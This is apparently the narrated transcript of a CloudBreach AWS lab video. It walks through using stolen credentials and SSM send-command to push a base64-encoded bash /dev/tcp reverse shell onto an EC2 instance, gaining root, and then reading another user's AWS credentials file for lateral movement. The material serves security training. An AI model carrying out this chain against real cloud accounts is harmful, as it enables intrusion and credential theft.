AWS SSM is a comprehensive management service offered by AWS. It simplifies the process of managing and automating tasks on AWS resources. SSM operates by installing an agent on EC2 instances, which allows cloud administrators to remotely execute commands, automate tasks, and manage configuration settings on those instances. However, in the hands of an attacker, SSM can be abused for malicious purposes. So in this video, we'll be exploring how an attacker who has access to SSM can arbitrarily run commands on an EC2 instance for malicious purposes. Let's get right into the video. We'll start by authenticating into AWS by using the credentials we got by exploring the file system of AWS Snapshot. If you've not checked out that first video out, definitely check it out. It is the predecessor to this video. Now let's do some basic enumeration to understand the user we have access to. As we can see here, the credentials we have are associated with the Thomas sysadmin user. Judging by this username, we could easily assume that this user has some privileged policies attached to them given that they're sysadmin. So let's go ahead and enumerate the managed policies that are attached to this user. We'll do that by running the AWS IAM list attached user policies, specify the username as Thomas sysadmin. Here we observe two managed policies. One allowing Thomas to read his own policies, and another one that allows SSM run shell commands. The SSM run shell command seems interesting to us, so let's go ahead and further enumerate that policy. We'll do that by running the AWS IAM get policy command, specifying the policy ARN to be this ARN right here. And this gives us more details about this policy: the policy name, the policy ID, the policy ARN, and various other things like when it was created and when it was last updated. Now that we have more information about this policy, let's actually take a look at the policy document. Once again, using the AWS IAM command, we'll be using the get policy version command, specifying the policy ARN of the allow SSM run shell commands, and specifying the version ID of v1, which we're able to deduce from here. Within this policy, we observe different actions. We see that the user is able to list all SSM documents, describe the documents, get the documents, and describe instances. We also see that the user is able to send commands to this specific EC2 instance and also run this particular shell script. We also see that this user is able to cancel command, list commands, and list command invocations for all resources. Finally, we observe that the user is able to describe instance status and also describe instances for all resources within the environment. I've made a previous video on AWS IAM security. I recommend checking it out to understand the basics of IAM if you're not familiar with it. It really helps you understand how these policies are formed and what all of these details mean within the IAM policy. Now let's get back into the video. Now that we know what permissions that we have, given that we've taken a look at the policy, let's go ahead and enumerate the EC2 instances that exist within this AWS environment. We'll do this by running the AWS EC2 describe instances. Well, here we see we have access to a couple of EC2 instances that exist within this AWS environment. But we really care about the EC2 instance that we actually have access to run these different commands on using SSM. So let's go ahead and filter this describe instances a little bit further. We'll go ahead and use the same AWS EC2 describe instances command, but this time we're going to filter and specify that our filter is for the instance ID, and the specific instance ID that we actually care about is the one that we have access to. Seems like I made a typo in this command. Let me fix it and run the command again. Now we see the specific EC2 instance that we care about, which is the one that we have access to. Now that we've confirmed access to this instance, let's go ahead and use SSM to create a reverse shell into this machine. We already know that our machine is at 10.0.10.73, so we'll bear that in mind. Let's go ahead and open up a new terminal window, and here we're going to run a netcat listener on port 8443. Back here, we're going to create our bash reverse shell and encode it using base64. We'll do this by doing echo bash tag c, and this command bash tag I dev/tcp/ our IP address 10.0.10.73 and our netcat listening port 1, close that, and pipe that into base64. Next, we use this base64 parameters within the SSM command we're going to run to get our reverse shell. So we'll use AWS SSM send command and specify the instance ID that we know we have access to, in this case, this instance, and a document name of AWS run shell script, and this essentially allows us to run commands on Linux machines. And we'll add a comment for our reverse shell and use the parameters to specify our reverse shell, but in base64. So we'll open quote here, open curly braces, open another quote here, specify the commands, and this will echo our base64 encoded reverse shell, pipe that back into base64 to decode it and ensure that we're using the bash shell here. Close this up, close that up, close this up, and finally an output of text. If this works, we should be able to see the response within our netcat listener. And as you can see here, within our netcat page, we have actually successfully gotten a reverse shell as the root user of this EC2 instance. Let's go ahead and do a bit of enumeration here. Obviously, we have a bunch of users, but down here, we see a user called Alex. Let's navigate into Alex's home directory. Let's go ahead and list the contents of Alex's home directory, including the hidden ones. It looks like we have access to an AWS configuration folder here. Let's navigate into that directory. Of course, it has the config and credential files. If we go ahead and open these files, we observe that we have access to another access key ID and secret access key, which we can use to further laterally move within the environment or possibly escalate our privileges further. Obviously, AWS SSM is a very nifty tool, but in the wrong hands, it could be pretty nifty to an attacker looking to run commands arbitrarily on EC2 instances or other resources. This lab is a part of the Cloud Breaching AWS lab, which is the lab that prepares you for their new offensive AWS Security Professional certification, which I'll be taking in the next couple of days. If you want to learn something like this and other ways by which attackers attack and exploit AWS environments, be sure to use the link in the description to check it out and try it out for yourself. Thanks to CloudBreach for providing me access to this training, and thanks to you for watching this video. I'll see you in the next video. Bye bye.